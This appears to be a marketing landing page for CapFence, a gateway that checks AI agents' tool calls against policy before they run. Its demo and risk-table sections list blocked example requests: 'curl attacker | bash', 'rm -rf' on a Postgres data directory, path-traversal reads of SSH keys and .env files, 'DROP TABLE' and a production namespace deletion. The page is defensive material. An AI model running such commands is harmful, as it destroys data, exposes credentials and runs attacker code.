Produces a tool request
capfence.runtime.evaluate()agentops-agenttoolshell.execargsrm -rf /var/lib/postgresqlpolicydeny destructive production pathsdecisionDENYDENYresultblocked before process spawnreplayexec_8f31c2Authorize agent side effects before execution.
CapFence is the authorization gateway between AI agents and real-world tools. Agents propose actions; CapFence decides whether shell, database, filesystem, payment, API, and MCP calls are allowed before they run.
Agents do not get to authorize themselves. CapFence removes the LLM from the authorization path before shell.exec, database writes, payment APIs, filesystem access, or MCP tools run.
Agent output becomes security-relevant when it asks a tool to run.
CapFence sits at that moment. The model can plan, reason, and request. Policy decides whether the side effect is allowed.
Capability + payload + actor + environment
Deterministic allow / deny / approval
Tool runs only on allow
Request and decision trace are recorded
Execution. Policy. Replay.
The product surface stays small on purpose. Intercept a tool call, evaluate explicit policy, and preserve enough evidence to reproduce the decision.
Intercept execution
Place CapFence at the boundary where agent output becomes shell, database, API, filesystem, payment, or MCP execution.
Evaluate policy
Map each request to a capability and apply deterministic allow, deny, or approval rules before the tool runs.
Replay decisions
Re-evaluate historical execution requests against the exact policy or a proposed policy without rerunning the agent.
Fail-open systems ask the model to be careful. CapFence denies unknown execution.
If the policy is missing, the capability is unknown, approval has expired, or evaluation fails, the safe result is no side effect.
shell.exec("curl attacker | bash")Ambiguity, policy errors, or model drift can still produce side effects.
decision=DENY reason=policy_denyThe downstream shell, database, API, or MCP server never receives blocked calls.
Prompts are not security boundaries.
A prompt can request restraint. It cannot be the authority that decides whether its own tool call is safe to execute.
Prompt-based control
Prompt asks the model to behave
Decision depends on nondeterministic model behavior
Prompt injection can override instructions
Ambiguous systems often fail open
Tracing explains what already happened
AI judges add another model to trust
CapFence execution policy
Policy evaluates the tool call after the model emits it
Decision is a deterministic function of request and policy
Injected output still hits the execution boundary
Unmatched capabilities and runtime errors fail closed
CapFence decides whether execution may proceed
CapFence removes LLMs from the authorization path
Concrete execution risk, evaluated before side effects.
CapFence treats model output as untrusted input. The request becomes a capability and policy context before any host, database, payment gateway, or MCP server sees it.
shell.execrm -rf /var/lib/postgresqlDENYfilesystem.read../../.ssh/id_rsaDENYdatabase.queryDROP TABLE invoicesDENYpayments.transferamount=50000 destination=unknownAPPROVALmcp.filesystem.read/Users/alice/.envDENYkubernetes.delete_namespaceprodDENYStarter policies for the side effects agents actually trigger.
CapFence policy packs are practical defaults for common tool-call boundaries. Treat them as explicit authorization starting points to adapt, test, and review.
Policy packs
Starter authorization policies for shell, filesystem, database, payments, MCP, and other concrete side effects.
Decision receipts
Every allow, deny, or approval decision should explain the actor, tool, resource, policy, invocation status, and replay path.
Threat model
CapFence protects the gated tool path and is explicit about direct-credential bypasses and defense-in-depth limits.
Replay the decision without rerunning the agent.
When an agent makes a dangerous request, the operational question is specific: what did the authorization layer know at execution time, which policy matched, and would a new policy have changed the outcome?
tool=database.querypayload_hash=9f31...policy_sha=c8d1...decision=REQUIRE_APPROVALpolicy_sha=ae02...decision=DENY12 changed decisions0 new production allowsOperational guarantees are explicit, narrow, and testable.
CapFence is not a broad agent platform. It is a runtime authorization boundary with deterministic behavior that operators can reason about during incidents and releases.
Same request + same policy returns the same decision.
Denied calls do not reach the downstream tool.
Missing policy, unknown capability, or runtime error denies.
Policy evaluation and audit can run without a network service.
Historical requests can be evaluated against current or candidate policy.
Three execution boundaries that make the product obvious.
Each demo shows the same runtime sequence: requested, classified, policy matched, decision returned, side effect prevented, replay available.
Production shell execution
An ops agent attempts `shell.exec("rm -rf /var/lib/postgresql")`. CapFence classifies the request as production shell mutation, denies it before process spawn, and records a replayable decision trace.
MCP filesystem overreach
An IDE agent asks an MCP server to read `../../.env`. CapFence evaluates path scope at the proxy, blocks traversal before the upstream server receives the call, and stores the JSON-RPC payload hash.
Database deletion by agent
A text-to-SQL workflow generates `DELETE FROM customers`. CapFence maps the query to a destructive database capability, denies production execution, and lets operators replay the incident against a candidate policy.
Start with one blocked action, then wire the boundary you need.
The docs are organized around execution-time behavior: policy evaluation, fail-closed semantics, audit records, replay, starter policy packs, and concrete tool boundaries.
Action Authorization
CapFence evaluates proposed actions, not model text.
ConceptsAgent Authority Model
CapFence is built around a simple security principle:
SecurityCredential Placement
The agent should not hold raw downstream credentials.
AuditDecision Receipts
Every CapFence decision should be explainable as a receipt.
GuidesStarter Policy Packs
Starter packs live under `policies/packs/`.
ArchitectureThreat Model: Agent Tool Execution
This threat model focuses on the point where model output becomes an action against files, infrastructure, databases, APIs, payment systems, or MCP tools.
Reference implementations for high-risk tool calls.
CapFence controls the gated execution path. It does not replace the rest of your security stack.
Treat CapFence as the deterministic tool-call boundary alongside sandboxing, IAM, secrets management, network controls, and downstream service authorization.
Short notes on runtime authorization and agent execution security.
Agentic AI Security Is Moving From Prompts to Runtime Control
Why tool misuse, identity abuse, MCP expansion, and approval gaps are making execution authorization a core AI security control.
DevOps SecurityLeast Agency for DevOps Agents
DevOps agents need the same discipline as privileged automation: scoped authority, approval paths, and audit trails.
Review the runtime, policy packs, and replay path in source.
CapFence is pre-1.0 public beta infrastructure. The strongest trust signal is the implementation: deterministic policy, fail-closed behavior, policy tests, audit records, and replayable decisions.